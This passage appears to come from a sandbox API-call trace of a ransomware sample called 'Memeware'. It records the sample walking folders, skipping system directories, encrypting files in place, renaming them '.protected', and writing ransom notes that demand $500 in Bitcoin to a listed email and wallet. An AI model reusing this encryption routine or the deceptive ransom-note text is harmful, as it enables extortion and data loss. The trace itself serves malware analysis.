Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected") returned 148 [0073.552] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.protected")) returned 1 [0073.553] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0073.553] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0073.553] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 130 [0073.553] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0073.554] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.554] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0073.555] lstrlenA (lpString="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") returned 684 [0073.555] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0073.555] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.555] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0073.555] CloseHandle (hObject=0xd4) returned 1 [0073.556] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0073.556] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0073.556] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 109 [0073.556] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0073.556] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.556] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0073.557] lstrlenA (lpString="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") returned 684 [0073.557] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0073.557] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.557] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0073.557] CloseHandle (hObject=0xb4) returned 1 [0073.557] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0073.557] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0073.558] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\RESTORE_FILES.txt") returned 100 [0073.558] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0073.558] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.558] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0073.559] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.559] WriteFile (in: hFile=0xa4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0073.559] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.559] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0073.559] CloseHandle (hObject=0xa4) returned 1 [0073.559] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0073.559] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="Windows") returned -1 [0073.559] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="Program Files") returned -1 [0073.559] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="Program Files (x86)") returned -1 [0073.559] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="$Recycle.bin") returned 1 [0073.559] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="System Volume Information") returned -1 [0073.559] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 71 [0073.559] lstrcmpW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2=".") returned 1 [0073.559] lstrcmpW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="..") returned 1 [0073.559] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*") returned 73 [0073.560] FindFirstFileW 
(in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0073.560] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.560] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.560] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.560] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.560] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.560] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\.") returned 73 [0073.560] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.560] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.560] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.560] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.560] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.560] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.560] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.560] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\..") returned 74 [0073.560] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.560] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.560] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.560] lstrcmpiW (lpString1="state.rsm", lpString2="Windows") returned -1 [0073.560] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files") returned 1 [0073.560] lstrcmpiW (lpString1="state.rsm", lpString2="Program Files 
(x86)") returned 1 [0073.560] lstrcmpiW (lpString1="state.rsm", lpString2="$Recycle.bin") returned 1 [0073.560] lstrcmpiW (lpString1="state.rsm", lpString2="System Volume Information") returned -1 [0073.560] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 81 [0073.560] StrStrIW (lpFirst="state.rsm", lpSrch=".protected") returned 0x0 [0073.560] lstrcmpW (lpString1="state.rsm", lpString2="RESTORE_FILES.txt") returned 1 [0073.560] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0073.560] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0073.560] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0073.561] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 81 [0073.561] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0073.561] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 81 [0073.561] StrStrW (lpFirst="state.rsm", lpSrch=".rar") returned 0x0 [0073.561] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 81 [0073.561] StrStrW (lpFirst="state.rsm", lpSrch=".zip") returned 0x0 [0073.561] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | 
out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x28e, lpOverlapped=0x0) returned 1 [0073.562] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffd72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.562] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x28e, lpOverlapped=0x0) returned 1 [0073.562] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.562] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0073.562] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0073.562] CloseHandle (hObject=0xb4) returned 1 [0073.563] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.protected") returned 91 [0073.563] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.protected" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.protected")) returned 1 [0073.564] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.564] lstrcmpiW (lpString1="vcredist_x86.exe", 
lpString2="Windows") returned -1 [0073.564] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="Program Files") returned 1 [0073.564] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="Program Files (x86)") returned 1 [0073.564] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="$Recycle.bin") returned 1 [0073.564] lstrcmpiW (lpString1="vcredist_x86.exe", lpString2="System Volume Information") returned 1 [0073.564] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 88 [0073.564] StrStrIW (lpFirst="vcredist_x86.exe", lpSrch=".protected") returned 0x0 [0073.564] lstrcmpW (lpString1="vcredist_x86.exe", lpString2="RESTORE_FILES.txt") returned 1 [0073.564] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0073.564] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0073.564] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0073.564] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 88 [0073.564] StrStrW (lpFirst="vcredist_x86.exe", lpSrch=".txt") returned 0x0 [0073.564] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 88 [0073.564] StrStrW (lpFirst="vcredist_x86.exe", lpSrch=".rar") returned 0x0 [0073.564] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package 
Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 88 [0073.564] StrStrW (lpFirst="vcredist_x86.exe", lpSrch=".zip") returned 0x0 [0073.564] ReadFile (in: hFile=0xb4, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0073.574] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.574] WriteFile (in: hFile=0xb4, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0073.574] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.574] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0073.581] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0073.581] CloseHandle (hObject=0xb4) returned 1 [0073.607] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.protected") returned 98 [0073.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package 
Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.protected" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.protected")) returned 1 [0073.607] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0073.607] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0073.608] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\RESTORE_FILES.txt") returned 89 [0073.608] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0073.609] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.609] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0073.610] lstrlenA (lpString="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") returned 684 [0073.610] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0073.610] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.610] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, 